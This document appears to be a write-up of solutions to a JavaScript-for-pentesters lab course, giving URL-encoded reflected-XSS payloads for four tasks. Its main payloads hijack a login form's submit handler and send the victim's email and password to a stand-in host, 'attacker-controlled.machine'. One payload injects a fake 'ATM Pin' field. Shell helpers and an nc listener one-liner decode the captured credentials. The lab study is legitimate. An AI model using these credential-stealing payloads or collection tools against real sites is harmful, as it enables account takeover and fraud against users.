js-for-pentesters.md

Target

https://www.pentesteracademy.com/course?id=11

Prereq

Add the rawurlencode() bash function from this answer to your .bashrc; every payload below is passed through it so it can be carried in the url query parameter:

https://stackoverflow.com/questions/296536/how-to-urlencode-data-for-curl-command/10660730#10660730

Multi-line payloads are first minified to a single line with uglifyjs (npm install -g uglify-js) before being encoded.
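For a self-contained setup, here is an added example of the helper, written for these notes rather than copied from the Stack Overflow answer: a POSIX sh rawurlencode that percent-encodes every byte outside the RFC 3986 unreserved set (A-Z a-z 0-9 - _ . ~). It works on raw bytes via od, so UTF-8 input is encoded byte by byte instead of being mangled as multibyte characters. The build_url helper is a name chosen here; it assembles the lab URL pattern used in the tasks below.

```shell
#!/bin/sh
# rawurlencode: percent-encode every byte of $1 except RFC 3986 unreserved characters.
# Works byte-wise (od) so multibyte UTF-8 input is handled correctly; output uses
# upper-case hex, which is what the encoded payloads in the lab URLs need.
rawurlencode() {
  printf '%s' "$1" | od -An -tx1 -v | tr -d ' \n' | fold -w 2 |
  while IFS= read -r hex || [ -n "$hex" ]; do      # "|| -n" keeps the last byte (no trailing newline after fold)
    case $hex in
      # 0-9 (30-39), A-Z (41-5a), a-z (61-7a), '-' (2d), '.' (2e), '_' (5f), '~' (7e): emit literally
      3[0-9]|4[1-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]|2d|2e|5f|7e)
        printf "\\$(printf '%03o' "0x$hex")" ;;   # octal escape: portable way to print a byte in sh
      *)
        printf '%%%s' "$(printf '%s' "$hex" | tr abcdef ABCDEF)" ;;
    esac
  done
  echo
}

# build_url: glue a lab URL and a raw JavaScript payload into "<url>?url=<encoded payload>".
# (helper name chosen for this example; the lab only needs the url= parameter)
build_url() {
  printf '%s?url=%s\n' "$1" "$(rawurlencode "$2")"
}

# Example run, using the Task 1 endpoint from these notes:
build_url 'https://pentesteracademylab.appspot.com/lab/webapp/jfp/1' '<script>alert(1)</script>'
```

Drop the function into .bashrc as a replacement for the one linked above if you prefer a dependency-free version; it is slower per byte than the bash-only original but produces identical output for ASCII payloads.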

Task 1

https://pentesteracademylab.appspot.com/lab/webapp/jfp/1

Solution

https://pentesteracademylab.appspot.com/lab/webapp/jfp/1?url=<payload>

The value of url is reflected into the page, so the encoded <script> block executes in the page's origin.

Payload generation:
$ rawurlencode '<script>document.getElementsByTagName("h2")[2].innerHTML = "Modified you"</script>'
$ rawurlencode '<script>document.getElementsByTagName("h1")[0].innerHTML = "Found you"</script>'

Task 2

https://pentesteracademylab.appspot.com/lab/webapp/jfp/2

Solution

https://pentesteracademylab.appspot.com/lab/webapp/jfp/2?url=<payload>

Payload generation:
$ rawurlencode '<script>var a = document.getElementsByTagName("a"); for (var i = 0; i < a.length; ++i) { a[i].href = "http://PentesterAcademy.com/topics"; }</script>'

Task 3

https://pentesteracademylab.appspot.com/lab/webapp/jfp/3

Solution

https://pentesteracademylab.appspot.com/lab/webapp/jfp/3?email=<email>&password=111&url=<payload>

(The email address in the original notes is obfuscated; the form submits via GET, so the email and password fields appear as query parameters next to the injected url.)

Preparing the payload (hooking the form's submit handler and leaking the credentials through a rogue <img> request):

$ cat > JSforPentesters-3.js <<'EOF'
// Hook the login form's submit and leak the typed credentials through an image
// request; the browser fetches the src as soon as it is assigned, no DOM insertion needed.
function intercept() {
    var f = document.forms[0];
    // encodeURIComponent keeps "&" or "#" in a value from truncating the query string
    new Image().src = "https://attacker-controlled.machine/3?email=" +
        encodeURIComponent(f.elements[0].value) + "&password=" +
        encodeURIComponent(f.elements[1].value);
    return false;  // cancels the real login; return true to let it proceed unnoticed
}
document.forms[0].onsubmit = intercept;
EOF

$ rawurlencode "<script>$(uglifyjs JSforPentesters-3.js)</script>"

Alternative payload (sending the beacon with XMLHttpRequest; the request is cross-origin, so CORS applies, but a simple GET is still sent and only the response is withheld from the page, which the attacker's server does not need anyway):

$ cat > JSforPentesters-3-2.js <<'EOF'
// Same interception as above, but the beacon is an XHR. A GET with no custom headers is a
// "simple" CORS request: it leaves the browser regardless of the target's CORS headers.
function intercept() {
    var f = document.forms[0];
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://attacker-controlled.machine/3?email=" +
        encodeURIComponent(f.elements[0].value) + "&password=" +
        encodeURIComponent(f.elements[1].value));
    xhr.send();       // response is blocked by CORS, but the request and its query string arrive
    return false;     // cancels the real login; return true to let it proceed unnoticed
}
document.forms[0].onsubmit = intercept;
EOF

$ rawurlencode "<script>$(uglifyjs JSforPentesters-3-2.js)</script>"
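Something has to receive the beacon. The following is an added example for these notes, not part of the course or the original write-up: a POSIX sh helper that takes the request line a plain listener prints when the beacon arrives and recovers the leaked email and password, undoing the percent-encoding. The request line below is constructed for the example. The payload targets https://attacker-controlled.machine, so a bare listener only sees the request if a TLS terminator fronts it (or the payload is pointed at a plain http:// URL, which modern browsers may upgrade or block as mixed content on an https page).

```shell
#!/bin/sh
# Constructed sample of the request line a plain listener would print when the
# Task 3 beacon arrives (not real captured traffic).
SAMPLE_REQUEST='GET /3?email=test%40example.com&password=p%26w%20d HTTP/1.1'

# urldecode: replace every %XX with the byte it encodes, using printf octal escapes
# (portable sh, no \x needed). '+' is left alone: it only means space in form bodies,
# not in a query built with encodeURIComponent.
urldecode() {
  ud_rest=$1
  ud_out=
  while [ -n "$ud_rest" ]; do
    case $ud_rest in
      %[0-9A-Fa-f][0-9A-Fa-f]*)
        ud_hex=${ud_rest#%}
        ud_hex=${ud_hex%"${ud_hex#??}"}                        # the two hex digits after '%'
        ud_out=$ud_out$(printf "\\$(printf '%03o' "0x$ud_hex")")
        ud_rest=${ud_rest#???}
        ;;
      *)
        ud_out=$ud_out${ud_rest%"${ud_rest#?}"}                # copy one literal character
        ud_rest=${ud_rest#?}
        ;;
    esac
  done
  printf '%s\n' "$ud_out"
}

# extract_creds: given one HTTP request line, print "<email>TAB<password>" decoded.
# Parameter names match the ones the payload in these notes sends (email, password).
extract_creds() {
  ec_query=${1#*"?"}          # drop "GET /3?"
  ec_query=${ec_query%% *}    # drop " HTTP/1.1"
  ec_email=
  ec_password=
  ec_rest=$ec_query
  while [ -n "$ec_rest" ]; do
    ec_pair=${ec_rest%%&*}
    case $ec_rest in
      *\&*) ec_rest=${ec_rest#*&} ;;
      *)    ec_rest= ;;
    esac
    ec_key=${ec_pair%%=*}
    ec_val=${ec_pair#*=}
    case $ec_key in
      email)    ec_email=$(urldecode "$ec_val") ;;
      password) ec_password=$(urldecode "$ec_val") ;;
    esac
  done
  printf '%s\t%s\n' "$ec_email" "$ec_password"
}

# Example run on the constructed line:
extract_creds "$SAMPLE_REQUEST"

# Live use (listen syntax depends on your nc; TLS must be terminated in front of it):
#   nc -l 8443 | while IFS= read -r line; do case $line in GET*) extract_creds "$line" ;; esac; done
```

A password containing a newline would lose it on the way through command substitution, which strips trailing newlines; everything else, including "&", "%" and "@", survives the round trip.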

Task 4

https://pentesteracademylab.appspot.com/lab/webapp/jfp/4

Solution

https://pentesteracademylab.appspot.com/lab/webapp/jfp/4?email=<email>&password=111&url=<payload>

(As in Task 3, the email address in the original notes is obfuscated.)

Payload generation:

$ cat > JSforPentesters-4.js <<'EOF'
// Inject a fake "ATM Pin" field into the login form, styled like the real inputs,
// so whatever the victim types into it is sent along with the genuine form submission.
var pin = document.createElement("input");
pin.setAttribute("type", "text");
pin.setAttribute("value", "");
pin.setAttribute("class", "input-block-level");   // reuse the form's own input class so it blends in
pin.setAttribute("placeholder", "ATM Pin");
pin.setAttribute("name", "pin");
// Place it between the first (email) and second (password) fields. insertBefore requires
// elements[1] to be a direct child of the form; if the inputs are wrapped, use
// elements[1].parentNode.insertBefore(pin, elements[1]) instead.
document.forms[0].insertBefore(pin, document.forms[0].elements[1]);
EOF

$ rawurlencode "<script>$(uglifyjs JSforPentesters-4.js)</script>"